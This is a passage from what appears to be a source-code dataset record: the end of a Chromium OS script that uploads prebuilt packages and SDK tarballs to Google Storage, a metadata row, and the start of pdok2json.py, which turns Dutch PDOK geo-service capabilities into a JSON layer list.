"""Given the list of |files|, generate an index.html at |index|.
Args:
files: The list of files to link to.
index: The path to the html index.
board: Name of the board this index is for.
version: Build version this index is for.
"""
head = """<html>
<head>
<title>Package Prebuilt Index: %(board)s / %(version)s</title>
</head>
<body>
<h2>Package Prebuilt Index: %(board)s / %(version)s</h2>"""
head %= {
'board': board,
'version': version,
}
files = files + [
'.|Google Storage Index',
'..|',
]
commands.GenerateHtmlIndex(index, files, head=head)
def _GrabAllRemotePackageIndexes(binhost_urls):
"""Grab all of the packages files associated with a list of binhost_urls.
Args:
binhost_urls: The URLs for the directories containing the Packages files we
want to grab.
Returns:
A list of PackageIndex objects.
"""
pkg_indexes = []
for url in binhost_urls:
pkg_index = binpkg.GrabRemotePackageIndex(url)
if pkg_index:
pkg_indexes.append(pkg_index)
return pkg_indexes
class PrebuiltUploader(object):
"""Synchronize host and board prebuilts."""
def __init__(self, upload_location, acl, binhost_base_url, pkg_indexes,
build_path, packages, skip_upload, binhost_conf_dir, dryrun,
target, slave_targets, version):
"""Constructor for prebuilt uploader object.
This object can upload host or prebuilt files to Google Storage.
Args:
upload_location: The upload location.
acl: The canned acl used for uploading to Google Storage. acl can be one
of: "public-read", "public-read-write", "authenticated-read",
"bucket-owner-read", "bucket-owner-full-control", "project-private",
or "private" (see "gsutil help acls"). If we are not uploading to
Google Storage, this parameter is unused.
binhost_base_url: The URL used for downloading the prebuilts.
pkg_indexes: Old uploaded prebuilts to compare against. Instead of
uploading duplicate files, we just link to the old files.
build_path: The path to the directory containing the chroot.
packages: Packages to upload.
skip_upload: Don't actually upload the tarballs.
binhost_conf_dir: Directory where to store binhost.conf files.
dryrun: Don't push or upload prebuilts.
target: BuildTarget managed by this builder.
slave_targets: List of BuildTargets managed by slave builders.
version: A unique string, intended to be included in the upload path,
which identifies the version number of the uploaded prebuilts.
"""
self._upload_location = upload_location
self._acl = acl
self._binhost_base_url = binhost_base_url
self._pkg_indexes = pkg_indexes
self._build_path = build_path
self._packages = set(packages)
self._found_packages = set()
self._skip_upload = skip_upload
self._binhost_conf_dir = binhost_conf_dir
self._dryrun = dryrun
self._target = target
self._slave_targets = slave_targets
self._version = version
self._gs_context = gs.GSContext(retries=_RETRIES, sleep=_SLEEP_TIME,
dry_run=self._dryrun)
def _Upload(self, local_file, remote_file):
"""Wrapper around _GsUpload"""
_GsUpload(self._gs_context, self._acl, local_file, remote_file)
def _ShouldFilterPackage(self, pkg):
if not self._packages:
return False
pym_path = os.path.abspath(os.path.join(self._build_path, _PYM_PATH))
sys.path.insert(0, pym_path)
# pylint: disable=F0401
import portage.versions
cat, pkgname = portage.versions.catpkgsplit(pkg['CPV'])[0:2]
cp = '%s/%s' % (cat, pkgname)
self._found_packages.add(cp)
return pkgname not in self._packages and cp not in self._packages
def _UploadPrebuilt(self, package_path, url_suffix):
"""Upload host or board prebuilt files to Google Storage space.
Args:
package_path: The path to the packages dir.
url_suffix: The remote subdirectory where we should upload the packages.
"""
# Process Packages file, removing duplicates and filtered packages.
pkg_index = binpkg.GrabLocalPackageIndex(package_path)
pkg_index.SetUploadLocation(self._binhost_base_url, url_suffix)
pkg_index.RemoveFilteredPackages(self._ShouldFilterPackage)
uploads = pkg_index.ResolveDuplicateUploads(self._pkg_indexes)
unmatched_pkgs = self._packages - self._found_packages
if unmatched_pkgs:
logging.warning('unable to match packages: %r' % unmatched_pkgs)
# Write Packages file.
pkg_index.header['TTL'] = _BINPKG_TTL
tmp_packages_file = pkg_index.WriteToNamedTemporaryFile()
remote_location = '%s/%s' % (self._upload_location.rstrip('/'), url_suffix)
assert remote_location.startswith('gs://')
# Build list of files to upload. Manually include the dev-only files but
# skip them if not present.
# TODO(deymo): Upload dev-only-extras.tbz2 as dev-only-extras.tar.bz2
# outside packages/ directory. See crbug.com/448178 for details.
if os.path.exists(os.path.join(package_path, 'dev-only-extras.tbz2')):
uploads.append({'CPV': 'dev-only-extras'})
upload_files = GenerateUploadDict(package_path, remote_location, uploads)
remote_file = '%s/Packages' % remote_location.rstrip('/')
upload_files[tmp_packages_file.name] = remote_file
RemoteUpload(self._gs_context, self._acl, upload_files)
with tempfile.NamedTemporaryFile(
prefix='chromite.upload_prebuilts.index.') as index:
GenerateHtmlIndex(
[x[len(remote_location) + 1:] for x in upload_files.values()],
index.name, self._target, self._version)
self._Upload(index.name, '%s/index.html' % remote_location.rstrip('/'))
link_name = 'Prebuilts[%s]: %s' % (self._target, self._version)
url = '%s%s/index.html' % (gs.PUBLIC_BASE_HTTPS_URL,
remote_location[len(gs.BASE_GS_URL):])
logging.PrintBuildbotLink(link_name, url)
def _UploadSdkTarball(self, board_path, url_suffix, prepackaged,
toolchains_overlay_tarballs,
toolchains_overlay_upload_path,
toolchain_tarballs, toolchain_upload_path):
"""Upload a tarball of the sdk at the specified path to Google Storage.
Args:
board_path: The path to the board dir.
url_suffix: The remote subdirectory where we should upload the packages.
prepackaged: If given, a tarball that has been packaged outside of this
script and should be used.
toolchains_overlay_tarballs: List of toolchains overlay tarball
specifications to upload. Items take the form
"toolchains_spec:/path/to/tarball".
toolchains_overlay_upload_path: Path template under the bucket to place
toolchains overlay tarballs.
toolchain_tarballs: List of toolchain tarballs to upload.
toolchain_upload_path: Path under the bucket to place toolchain tarballs.
"""
remote_location = '%s/%s' % (self._upload_location.rstrip('/'), url_suffix)
assert remote_location.startswith('gs://')
boardname = os.path.basename(board_path.rstrip('/'))
# We do not upload non SDK board tarballs,
assert boardname == constants.CHROOT_BUILDER_BOARD
assert prepackaged is not None
version_str = self._version[len('chroot-'):]
remote_tarfile = toolchain.GetSdkURL(
for_gsutil=True, suburl='cros-sdk-%s.tar.xz' % (version_str,))
# For SDK, also upload the manifest which is guaranteed to exist
# by the builderstage.
self._Upload(prepackaged + '.Manifest', remote_tarfile + '.Manifest')
self._Upload(prepackaged, remote_tarfile)
# Upload SDK toolchains overlays and toolchain tarballs, if given.
for tarball_list, upload_path, qualifier_name in (
(toolchains_overlay_tarballs, toolchains_overlay_upload_path,
'toolchains'),
(toolchain_tarballs, toolchain_upload_path, 'target')):
for tarball_spec in tarball_list:
qualifier_val, local_path = tarball_spec.split(':')
suburl = upload_path % {qualifier_name: qualifier_val}
remote_path = toolchain.GetSdkURL(for_gsutil=True, suburl=suburl)
self._Upload(local_path, remote_path)
# Finally, also update the pointer to the latest SDK on which polling
# scripts rely.
with osutils.TempDir() as tmpdir:
pointerfile = os.path.join(tmpdir, 'cros-sdk-latest.conf')
remote_pointerfile = toolchain.GetSdkURL(for_gsutil=True,
suburl='cros-sdk-latest.conf')
osutils.WriteFile(pointerfile, 'LATEST_SDK="%s"' % version_str)
self._Upload(pointerfile, remote_pointerfile)
def _GetTargets(self):
"""Retuns the list of targets to use."""
targets = self._slave_targets[:]
if self._target:
targets.append(self._target)
return targets
def SyncHostPrebuilts(self, key, git_sync, sync_binhost_conf):
"""Synchronize host prebuilt files.
This function will sync both the standard host packages, plus the host
packages associated with all targets that have been "setup" with the
current host's chroot. For instance, if this host has been used to build
x86-generic, it will sync the host packages associated with
'i686-pc-linux-gnu'. If this host has also been used to build arm-generic,
it will also sync the host packages associated with
'armv7a-cros-linux-gnueabi'.
Args:
key: The variable key to update in the git file.
git_sync: If set, update make.conf of target to reference the latest
prebuilt packages generated here.
sync_binhost_conf: If set, update binhost config file in
chromiumos-overlay for the host.
"""
# Slave boards are listed before the master board so that the master board
# takes priority (i.e. x86-generic preflight host prebuilts takes priority
# over preflight host prebuilts from other builders.)
binhost_urls = []
for target in self._GetTargets():
url_suffix = _REL_HOST_PATH % {'version': self._version,
'host_arch': _HOST_ARCH,
'target': target}
packages_url_suffix = '%s/packages' % url_suffix.rstrip('/')
if self._target == target and not self._skip_upload:
# Upload prebuilts.
package_path = os.path.join(self._build_path, _HOST_PACKAGES_PATH)
self._UploadPrebuilt(package_path, packages_url_suffix)
# Record URL where prebuilts were uploaded.
binhost_urls.append('%s/%s/' % (self._binhost_base_url.rstrip('/'),
packages_url_suffix.rstrip('/')))
binhost = ' '.join(binhost_urls)
if git_sync:
git_file = os.path.join(self._build_path, _PREBUILT_MAKE_CONF[_HOST_ARCH])
RevGitFile(git_file, {key: binhost}, dryrun=self._dryrun)
if sync_binhost_conf:
binhost_conf = os.path.join(
self._binhost_conf_dir, 'host', '%s-%s.conf' % (_HOST_ARCH, key))
UpdateBinhostConfFile(binhost_conf, key, binhost)
def SyncBoardPrebuilts(self, key, git_sync, sync_binhost_conf,
upload_board_tarball, prepackaged_board,
toolchains_overlay_tarballs,
toolchains_overlay_upload_path,
toolchain_tarballs, toolchain_upload_path):
"""Synchronize board prebuilt files.
Args:
key: The variable key to update in the git file.
git_sync: If set, update make.conf of target to reference the latest
prebuilt packages generated here.
sync_binhost_conf: If set, update binhost config file in
chromiumos-overlay for the current board.
upload_board_tarball: Include a tarball of the board in our upload.
prepackaged_board: A tarball of the board built outside of this script.
toolchains_overlay_tarballs: List of toolchains overlay tarball
specifications to upload. Items take the form
"toolchains_spec:/path/to/tarball".
toolchains_overlay_upload_path: Path template under the bucket to place
toolchains overlay tarballs.
toolchain_tarballs: A list of toolchain tarballs to upload.
toolchain_upload_path: Path under the bucket to place toolchain tarballs.
"""
updated_binhosts = set()
for target in self._GetTargets():
board_path = os.path.join(self._build_path,
_BOARD_PATH % {'board': target.board_variant})
package_path = os.path.join(board_path, 'packages')
url_suffix = _REL_BOARD_PATH % {'target': target,
'version': self._version}
packages_url_suffix = '%s/packages' % url_suffix.rstrip('/')
# Process the target board differently if it is the main --board.
if self._target == target and not self._skip_upload:
# This strips "chroot" prefix because that is sometimes added as the
# --prepend-version argument (e.g. by chromiumos-sdk bot).
# TODO(build): Clean it up to be less hard-coded.
version_str = self._version[len('chroot-'):]
# Upload board tarballs in the background.
if upload_board_tarball:
if toolchain_upload_path:
toolchain_upload_path %= {'version': version_str}
if toolchains_overlay_upload_path:
toolchains_overlay_upload_path %= {'version': version_str}
tar_process = multiprocessing.Process(
target=self._UploadSdkTarball,
args=(board_path, url_suffix, prepackaged_board,
toolchains_overlay_tarballs,
toolchains_overlay_upload_path, toolchain_tarballs,
toolchain_upload_path))
tar_process.start()
# Upload prebuilts.
self._UploadPrebuilt(package_path, packages_url_suffix)
# Make sure we finished uploading the board tarballs.
if upload_board_tarball:
tar_process.join()
assert tar_process.exitcode == 0
# TODO(zbehan): This should be done cleaner.
if target.board == constants.CHROOT_BUILDER_BOARD:
sdk_conf = os.path.join(self._binhost_conf_dir,
'host/sdk_version.conf')
sdk_settings = {
'SDK_LATEST_VERSION': version_str,
'TC_PATH': toolchain_upload_path,
}
RevGitFile(sdk_conf, sdk_settings, dryrun=self._dryrun)
# Record URL where prebuilts were uploaded.
url_value = '%s/%s/' % (self._binhost_base_url.rstrip('/'),
packages_url_suffix.rstrip('/'))
if git_sync:
git_file = DeterminePrebuiltConfFile(self._build_path, target)
RevGitFile(git_file, {key: url_value}, dryrun=self._dryrun)
if sync_binhost_conf:
# Update the binhost configuration file in git.
binhost_conf = os.path.join(
self._binhost_conf_dir, 'target', '%s-%s.conf' % (target, key))
updated_binhosts.add(binhost_conf)
UpdateBinhostConfFile(binhost_conf, key, url_value)
if sync_binhost_conf:
# Clear all old binhosts. The files must be left empty in case anybody
# is referring to them.
all_binhosts = set(glob.glob(os.path.join(
self._binhost_conf_dir, 'target', '*-%s.conf' % key)))
for binhost_conf in all_binhosts - updated_binhosts:
UpdateBinhostConfFile(binhost_conf, key, '')
class _AddSlaveBoardAction(argparse.Action):
"""Callback that adds a slave board to the list of slave targets."""
def __call__(self, parser, namespace, values, option_string=None):
getattr(namespace, self.dest).append(BuildTarget(values))
class _AddSlaveProfileAction(argparse.Action):
"""Callback that adds a slave profile to the list of slave targets."""
def __call__(self, parser, namespace, values, option_string=None):
if not namespace.slave_targets:
parser.error('Must specify --slave-board before --slave-profile')
if namespace.slave_targets[-1].profile is not None:
parser.error('Cannot specify --slave-profile twice for same board')
namespace.slave_targets[-1].profile = values
def ParseOptions(argv):
"""Returns options given by the user and the target specified.
Args:
argv: The args to parse.
Returns:
A tuple containing a parsed options object and BuildTarget.
The target instance is None if no board is specified.
"""
parser = commandline.ArgumentParser()
parser.add_argument('-H', '--binhost-base-url', default=_BINHOST_BASE_URL,
help='Base URL to use for binhost in make.conf updates')
parser.add_argument('--previous-binhost-url', action='append', default=[],
help='Previous binhost URL')
parser.add_argument('-b', '--board',
help='Board type that was built on this machine')
parser.add_argument('-B', '--prepackaged-tarball', type='path',
help='Board tarball prebuilt outside of this script.')
parser.add_argument('--toolchains-overlay-tarball',
dest='toolchains_overlay_tarballs',
action='append', default=[],
help='Toolchains overlay tarball specification to '
'upload. Takes the form '
'"toolchains_spec:/path/to/tarball".')
parser.add_argument('--toolchains-overlay-upload-path', default='',
help='Path template for uploading toolchains overlays.')
parser.add_argument('--toolchain-tarball', dest='toolchain_tarballs',
action='append', default=[],
help='Redistributable toolchain tarball.')
parser.add_argument('--toolchain-upload-path', default='',
help='Path to place toolchain tarballs in the sdk tree.')
parser.add_argument('--profile',
help='Profile that was built on this machine')
parser.add_argument('--slave-board', default=[], action=_AddSlaveBoardAction,
dest='slave_targets',
help='Board type that was built on a slave machine. To '
'add a profile to this board, use --slave-profile.')
parser.add_argument('--slave-profile', action=_AddSlaveProfileAction,
help='Board profile that was built on a slave machine. '
'Applies to previous slave board.')
parser.add_argument('-p', '--build-path', required=True,
help='Path to the directory containing the chroot')
parser.add_argument('--packages', action='append', default=[],
help='Only include the specified packages. '
'(Default is to include all packages.)')
parser.add_argument('-s', '--sync-host', default=False, action='store_true',
help='Sync host prebuilts')
parser.add_argument('-g', '--git-sync', default=False, action='store_true',
help='Enable git version sync (This commits to a repo.) '
'This is used by full builders to commit directly '
'to board overlays.')
parser.add_argument('-u', '--upload',
help='Upload location')
parser.add_argument('-V', '--prepend-version',
help='Add an identifier to the front of the version')
parser.add_argument('-f', '--filters', action='store_true', default=False,
help='Turn on filtering of private ebuild packages')
parser.add_argument('-k', '--key', default='PORTAGE_BINHOST',
help='Key to update in make.conf / binhost.conf')
parser.add_argument('--set-version',
help='Specify the version string')
parser.add_argument('--sync-binhost-conf', default=False, action='store_true',
help='Update binhost.conf in chromiumos-overlay or '
'chromeos-overlay. Commit the changes, but don\'t '
'push them. This is used for preflight binhosts.')
parser.add_argument('--binhost-conf-dir',
help='Directory to commit binhost config with '
'--sync-binhost-conf.')
parser.add_argument('-P', '--private', action='store_true', default=False,
help='Mark gs:// uploads as private.')
parser.add_argument('--skip-upload', action='store_true', default=False,
help='Skip upload step.')
parser.add_argument('--upload-board-tarball', action='store_true',
default=False,
help='Upload board tarball to Google Storage.')
parser.add_argument('-n', '--dry-run', dest='dryrun',
action='store_true', default=False,
help='Don\'t push or upload prebuilts.')
options = parser.parse_args(argv)
if not options.upload and not options.skip_upload:
parser.error('you need to provide an upload location using -u')
if not options.set_version and options.skip_upload:
parser.error('If you are using --skip-upload, you must specify a '
'version number using --set-version.')
target = None
if options.board:
target = BuildTarget(options.board, options.profile)
if target in options.slave_targets:
parser.error('--board/--profile must not also be a slave target.')
if len(set(options.slave_targets)) != len(options.slave_targets):
parser.error('--slave-boards must not have duplicates.')
if options.slave_targets and options.git_sync:
parser.error('--slave-boards is not compatible with --git-sync')
if (options.upload_board_tarball and options.skip_upload and
options.board == 'amd64-host'):
parser.error('--skip-upload is not compatible with '
'--upload-board-tarball and --board=amd64-host')
if (options.upload_board_tarball and not options.skip_upload and
not options.upload.startswith('gs://')):
parser.error('--upload-board-tarball only works with gs:// URLs.\n'
'--upload must be a gs:// URL.')
if options.upload_board_tarball and options.prepackaged_tarball is None:
parser.error('--upload-board-tarball requires --prepackaged-tarball')
if options.private:
if options.sync_host:
parser.error('--private and --sync-host/-s cannot be specified '
'together; we do not support private host prebuilts')
if not options.upload or not options.upload.startswith('gs://'):
parser.error('--private is only valid for gs:// URLs; '
'--upload must be a gs:// URL.')
if options.binhost_base_url != _BINHOST_BASE_URL:
parser.error('when using --private the --binhost-base-url '
'is automatically derived.')
if options.sync_binhost_conf and not options.binhost_conf_dir:
parser.error('--sync-binhost-conf requires --binhost-conf-dir')
if (options.toolchains_overlay_tarballs and
not options.toolchains_overlay_upload_path):
parser.error('--toolchains-overlay-tarball requires '
'--toolchains-overlay-upload-path')
return options, target
def main(argv):
# Set umask to a sane value so that files created as root are readable.
os.umask(0o22)
options, target = ParseOptions(argv)
# Calculate a list of Packages index files to compare against. Whenever we
# upload a package, we check to make sure it's not already stored in one of
# the packages files we uploaded. This list of packages files might contain
# both board and host packages.
pkg_indexes = _GrabAllRemotePackageIndexes(options.previous_binhost_url)
if options.set_version:
version = options.set_version
else:
version = GetVersion()
if options.prepend_version:
version = '%s-%s' % (options.prepend_version, version)
acl = 'public-read'
binhost_base_url = options.binhost_base_url
if options.private:
binhost_base_url = options.upload
if target:
acl = portage_util.FindOverlayFile(_GOOGLESTORAGE_GSUTIL_FILE,
board=target.board_variant,
buildroot=options.build_path)
if acl is None:
cros_build_lib.Die('No Google Storage ACL file %s found in %s overlay.',
_GOOGLESTORAGE_GSUTIL_FILE, target.board_variant)
binhost_conf_dir = None
if options.binhost_conf_dir:
binhost_conf_dir = os.path.join(options.build_path,
options.binhost_conf_dir)
uploader = PrebuiltUploader(options.upload, acl, binhost_base_url,
pkg_indexes, options.build_path,
options.packages, options.skip_upload,
binhost_conf_dir, options.dryrun,
target, options.slave_targets, version)
if options.sync_host:
uploader.SyncHostPrebuilts(options.key, options.git_sync,
options.sync_binhost_conf)
if options.board or options.slave_targets:
uploader.SyncBoardPrebuilts(options.key, options.git_sync,
options.sync_binhost_conf,
options.upload_board_tarball,
options.prepackaged_tarball,
options.toolchains_overlay_tarballs,
options.toolchains_overlay_upload_path,
options.toolchain_tarballs,
options.toolchain_upload_path)
|
[
"[email protected]"
] | |
f6fe00211068533c328738bf6f253220d231608a
|
a3dd364a07fb5da9e9cb22494fd1771dda259e43
|
/pdok2json.py
|
1f8a7852b26c3b96ae608b4a082685bae4076ffc
|
[] |
no_license
|
evetion/pdokservicesplugin
|
cd5aeb9b9f06af8e6073c3de8f735079476d93ae
|
593256537ebef747685ddaca657f25c0e4dbfa6a
|
refs/heads/master
| 2020-03-12T00:47:50.640084 | 2018-02-24T13:09:15 | 2018-02-24T13:09:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 49,510 |
py
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
PdokServicesPlugin pdok2json.py
Dit is een ruw python script om op basis van een rij service-url's
(wms, wfs, wcs en wmts) de capabilities van elke service op te halen, en
van elke 'laag' in die service een json object aan te maken me wat gegevens
van die laag.
Deze json wordt gebruikt om het bestandje pdok.json aan te maken
met python3 (LET OP alleen python3 werkt nu ivm encoding probleempjes)
python3 pdok2json.py > pdok.json
Dit bestand wordt in de PdokServicePlugin ingeladen om alle lagen te tonen.
Op dit moment werkt het voor alle services die in het 'services' object
onderin deze file staan.
De PDOK services zijn echter een bonte mengeling van versie en services en
hier en daar was een kleine hack nodig om ze allemaal te kunnen parsen.
Theoretisch kun je dus zelf een paar services toevoegen, maar houd rekening
met hickups :-)
begin : 2013-11-01
copyright : (C) 2012 by Richard Duivenvoorde
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from xml.dom.minidom import parse, parseString
import urllib.request, urllib.parse, urllib.error
import re
def childNodeValue(node, childName):
nodes = node.getElementsByTagName(childName)
if len(nodes)==1 and nodes[0].hasChildNodes():
return nodes[0].childNodes[0].nodeValue
if len(nodes)>1:
arr = u''
for child in nodes:
# extra check, we only want direct childs
if child.parentNode.nodeName==node.nodeName and child.hasChildNodes():
arr+=(child.childNodes[0].nodeValue)
arr+=','
return arr.rstrip(',')
return ""
def handleWCS(wcscapsurl):
dom = parse(urllib.request.urlopen(wcscapsurl))
#dom = parse(urllib.urlopen('http://geodata.nationaalgeoregister.nl/ahn25m/wcs?request=getcapabilities'))
contents = dom.getElementsByTagName('wcs:Contents')[0]
url = ''
for subelement in dom.getElementsByTagName('ows:Operation'):
if subelement.getAttribute('name')=='GetCoverage':
url = subelement.getElementsByTagName('ows:Get')[0].getAttribute('xlink:href')
global firstOne
comma = ''
servicetitle = childNodeValue(dom.getElementsByTagName('ows:ServiceIdentification')[0], 'ows:Title')
for coverage in contents.getElementsByTagName('wcs:CoverageSummary'):
title = childNodeValue(coverage, 'ows:Title')
layername = childNodeValue(coverage, 'wcs:Identifier')
abstract = childNodeValue(coverage, 'ows:Abstract')
try:
if not firstOne:
comma = ','
# some extract have strange chars, we decode to utf8
s = str('\n%s{"type":"wcs","title":"%s","abstract":"%s","url":"%s","layers":"%s","servicetitle":"%s"}' % (comma, title, abstract, url, layername, servicetitle)).encode('utf8')
# the comma behind the print makes print NOT add a \n newline behind it
# from: http://stackoverflow.com/questions/3249524/print-in-one-line-dynamically-python
# fix_print_with_import
print(s.decode('utf-8'), end=' ')
firstOne=False
except Exception as e:
#pass
# fix_print_with_import
print("\n\nFout!! In laag: %s" % layername)
# fix_print_with_import
print(e)
return
def handleWFS(wfscapsurl):
#dom = parse(urllib.urlopen(wmscapsurl))
# ^^ that is not working for some wicked cbs caps with coördinaat in it...
# hack: read string and find replace coördinaat with coordinaat
response = urllib.request.urlopen(wfscapsurl)
#response = urllib.urlopen('problem.xml')
string = response.read()
# cbs vierkanten
#string = re.sub(r"co.{1,2}rdin","coordin", string)
# rdinfo
#string = re.sub(r"<WFS_Capabilities","\n<WFS_Capabilities", string)
#print string
#return
dom = parseString(string)
#dom = parse(urllib.urlopen('http://geodata.nationaalgeoregister.nl/ahn25m/wfs?version=1.0.0&request=GetCapabilities'))
#dom = parse(urllib.urlopen('http://geodata.nationaalgeoregister.nl/bagviewer/wfs?request=getcapabilities'))
global firstOne
# some service run WFS 1.0.0 while others run 2.0.0
servicetitle = ''
if len(dom.getElementsByTagName('Service'))>0:
servicetitle = childNodeValue(dom.getElementsByTagName('Service')[0], 'Title')
elif len(dom.getElementsByTagName('ows:ServiceIdentification'))>0:
servicetitle = childNodeValue(dom.getElementsByTagName('ows:ServiceIdentification')[0], 'ows:Title')
# servicetitle can have newlines in it sometimes, which create havoc in json
servicetitle = servicetitle.replace('\r', '')
servicetitle = servicetitle.replace('\t', ' ')
servicetitle = servicetitle.replace('\n', ' ')
featuretypes = dom.getElementsByTagName('FeatureType')
for featuretype in featuretypes:
layername = childNodeValue(featuretype, 'Name')
title = childNodeValue(featuretype, 'Title')
# title can have newlines in it sometimes, which create havoc in json
title = title.replace('\r', '')
title = title.replace('\t', ' ')
title = title.replace('\n', ' ')
abstract = childNodeValue(featuretype, 'Abstract')
# abstract can have newlines in it, which create havoc in json
# because we only use abstract in html, we make <br/> of them
abstract = abstract.replace('\r', '')
abstract = abstract.replace('\t', ' ')
abstract = abstract.replace('\n', '<br/>')
url = wfscapsurl
comma = ''
try:
if not firstOne:
comma = ','
# some extract have strange chars, we decode to utf8
s = str('\n%s{"type":"wfs","title":"%s","abstract":"%s","url":"%s","layers":"%s","servicetitle":"%s"}' % (comma, title, abstract, url, layername, servicetitle)).encode('utf8')
# the comma behind the print makes print NOT add a \n newline behind it
# from: http://stackoverflow.com/questions/3249524/print-in-one-line-dynamically-python
# fix_print_with_import
print(s.decode('utf-8'), end=' ')
firstOne=False
except Exception as e:
#pass
# fix_print_with_import
print("\n\nFout!! In laag: %s" % layername)
# fix_print_with_import
print(e)
return
def handleWMTS(wmtscapsurl):
#dom = parse("wmts-getcapabilities_1.0.0.xml")
dom = parse(urllib.request.urlopen(wmtscapsurl))
#dom = parse(urllib.urlopen('http://geodata.nationaalgeoregister.nl/wmts?VERSION=1.0.0&request=GetCapabilities'))
#dom = parse(urllib.urlopen('http://geodata1.nationaalgeoregister.nl/luchtfoto/wmts/1.0.0/WMTSCapabilities.xml'))
#url = dom.getElementsByTagName('ows:ProviderSite')[0].getAttribute('xlink:href')
url = wmtscapsurl
servicetitle = dom.getElementsByTagName('ows:ServiceIdentification')[0].getElementsByTagName('ows:Title')[0].childNodes[0].nodeValue
contents = dom.getElementsByTagName('Contents')[0]
global firstOne
for layer in contents.getElementsByTagName('Layer'):
title = childNodeValue(layer, 'ows:Title')
layername = childNodeValue(layer, 'ows:Identifier')
imgformats = childNodeValue(layer, 'Format')
tilematrixsets = childNodeValue(layer, 'TileMatrixSet')
# wmts does not have some kind of abstract or description :-(
abstract = ''
# {"naam":"WMTS Agrarisch Areaal Nederland","url":"http://geodata.nationaalgeoregister.nl/tiles/service/wmts/aan","layers":["aan"],"type":"wmts","pngformaat":"image/png"},
comma = ''
try:
if not firstOne:
comma = ','
# some extract have strange chars, we decode to utf8
s = str('\n%s{"type":"wmts","title":"%s","abstract":"%s","url":"%s","layers":"%s","imgformats":"%s","tilematrixsets":"%s","servicetitle":"%s"}' % (comma, title, abstract, url, layername, imgformats, tilematrixsets, servicetitle)).encode('utf8')
# the comma behind the print makes print NOT add a \n newline behind it
# from: http://stackoverflow.com/questions/3249524/print-in-one-line-dynamically-python
# fix_print_with_import
print(s.decode('utf-8'), end=' ')
firstOne = False
except Exception as e:
#pass
# fix_print_with_import
print("\n\nFout!! In laag: %s" % layername)
# fix_print_with_import
print(e)
return
def handleWMS(wmscapsurl):
#dom = parse("wms-getcapabilities_1.3.0.xml")
#dom = parse("wms_cbs.xml")
#dom = parse("problem.xml")
#dom = parse(urllib.urlopen('http://geodata.nationaalgeoregister.nl/cbsvierkanten100m/wms?request=GetCapabilities'))
#dom = parse(urllib.urlopen(wmscapsurl))
# ^^ that is not working for some wicked cbs caps with coördinaat in it...
# hack: read string and find replace coördinaat with coordinaat
response = urllib.request.urlopen(wmscapsurl)
string = response.read()
#string = re.sub(r"co.+rdin","coordin", str(string))
#print(string)
dom = parseString(string)
cap = dom.getElementsByTagName('Capability')
getmap = cap[0].getElementsByTagName('GetMap');
url = getmap[0].getElementsByTagName('OnlineResource')[0].getAttribute('xlink:href')
imgformats = childNodeValue(getmap[0], 'Format')
servicetitle = childNodeValue(dom.getElementsByTagName('Service')[0], 'Title')
global firstOne
root = dom.getElementsByTagName('Layer')[0]
for layer in root.getElementsByTagName('Layer'):
#print(layer)
# xtra check, if this is again a grouping layer, skip it
# actually needed for habitatrichtlijn layers
if len(layer.getElementsByTagName('Layer'))>1:
#print('PASSING?')
pass
else:
title = childNodeValue(layer, 'Title')
# title can have newlines in it sometimes, which create havoc in json
title = title.replace('\r', '')
title = title.replace('\t', ' ')
title = title.replace('\n', ' ')
#print '|'
#print(title)
layername = childNodeValue(layer, 'Name')
abstract = childNodeValue(layer, 'Abstract')
maxscale = childNodeValue(layer, 'MaxScaleDenominator')
minscale = childNodeValue(layer, 'MinScaleDenominator')
#meta = layer.getElementsByTagName('MetadataURL')
#if meta != None:
# print "URL%s"%meta[0].getElementsByTagName('OnlineResource')[0].getAttribute('xlink:href')
# abstract can have newlines in it, which create havoc in json
# because we only use abstract in html, we make <br/> of them
abstract = abstract.replace('\r', '')
abstract = abstract.replace('\t', ' ')
abstract = abstract.replace('\n', '<br/>')
comma = ''
handled = False
for style in layer.getElementsByTagName('Style'):
styleName = childNodeValue(style, 'Name')
try:
if not firstOne:
comma = ','
# some extract have strange chars, we decode to utf8
s = str('\n%s{"type":"wms","title":"%s","abstract":"%s","url":"%s","layers":"%s","minscale":"%s","maxscale":"%s","servicetitle":"%s","imgformats":"%s", "style":"%s"}' % (comma, title, abstract, url, layername, minscale, maxscale, servicetitle, imgformats, styleName)).encode('utf8')
# the comma behind the print makes print NOT add a \n newline behind it
# from: http://stackoverflow.com/questions/3249524/print-in-one-line-dynamically-python
# fix_print_with_import
print(s.decode('utf-8'), end=' ')
firstOne = False
handled = True
except Exception as e:
#pass
# fix_print_with_import
print("\n\nFout!! In laag: %s" % layername)
# fix_print_with_import
print(e)
return
if not handled:
# ouch, apparently no styles??? (eg luchtfoto wms's)
comma = ','
s = str(
'\n%s{"type":"wms","title":"%s","abstract":"%s","url":"%s","layers":"%s","minscale":"%s","maxscale":"%s","servicetitle":"%s","imgformats":"%s", "style":"%s"}' % (
comma, title, abstract, url, layername, minscale, maxscale, servicetitle, imgformats, '')).encode('utf8')
# the comma behind the print makes print NOT add a \n newline behind it
# from: http://stackoverflow.com/questions/3249524/print-in-one-line-dynamically-python
# fix_print_with_import
print(s.decode('utf-8'), end=' ')
# services zoals genoemd in https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/
services = [
# alle wmts lagen (behalve luchtfoto) zitten in 1 service
# het heeft dus geen zin om de individuele wmts-url's uit het overzicht te gebruiken omdat die allemaal onderstaande caps teruggeven
('wmts', 'Luchtfoto Beeldmateriaal / PDOK 25 cm RGB (WMTS | Open)', 'https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wmts?request=GetCapabilities&service=WMTS'),
('wmts', 'Luchtfoto Beeldmateriaal / PDOK 25 cm Infrarood (WMTS | Open)', 'https://geodata.nationaalgeoregister.nl/luchtfoto/infrarood/wmts?request=GetCapabilities&service=WMTS'),
('wmts', 'PDOK overige services', 'https://geodata.nationaalgeoregister.nl/wmts?VERSION=1.0.0&request=GetCapabilities'),
# LET OP LET OP: de volgende lagen zitten in de wmts capabilities maar moeten eruit:
# brkpilot
# brkgeo
# gbkn
# kadastralekaart_intern
# en eruit vanwege niet meer geldig
# kadastralekaartv2
# luchtfoto
# en opentopo omhoog geplaatst bij de WMTS'en naast brt (JW) EN de image/jpeg eruit (die heeft PDOK bug!)
